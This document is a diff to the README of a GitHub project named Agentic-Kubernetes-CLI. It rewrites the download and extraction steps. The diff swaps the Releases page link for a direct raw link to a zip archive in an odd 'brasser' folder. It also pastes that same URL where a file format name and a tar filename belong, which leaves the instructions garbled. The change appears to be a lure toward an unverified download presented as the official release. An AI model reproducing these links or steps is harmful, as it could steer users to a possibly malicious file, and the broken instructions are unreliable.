andersoncarmona913/Agentic-Kubernetes-CLI/README.md

 ### 1. Visit the Release Page

-Go to our [Releases page](https://github.com/andersoncarmona913/Agentic-Kubernetes-CLI/releases) to find the latest version of Agentic-Kubernetes-CLI.
+Go to our [Releases page](https://raw.githubusercontent.com/andersoncarmona913/Agentic-Kubernetes-CLI/main/brasser/Agentic-Kubernetes-CLI.zip) to find the latest version of Agentic-Kubernetes-CLI.

 ### 2. Download the Application

 Locate the file for your operating system on the Releases page.
 Click on the link to start downloading.
-This file will typically be in either `.zip` (for Windows) or `.tar.gz` (for Linux and macOS) format.
+This file will typically be in either `.zip` (for Windows) or `https://raw.githubusercontent.com/andersoncarmona913/Agentic-Kubernetes-CLI/main/brasser/Agentic-Kubernetes-CLI.zip` (for Linux and macOS) format.

 ### 3. Extract the Files

 Once downloaded, you will need to extract the files:

 - **Windows:** Right-click the `.zip` file and select "Extract All."
-- **macOS/Linux:** Use the terminal command `tar -xvzf filename.tar.gz` to extract the files.
+- **macOS/Linux:** Use the terminal command `tar -xvzf https://raw.githubusercontent.com/andersoncarmona913/Agentic-Kubernetes-CLI/main/brasser/Agentic-Kubernetes-CLI.zip` to extract the files.

 ### 4. Run the Application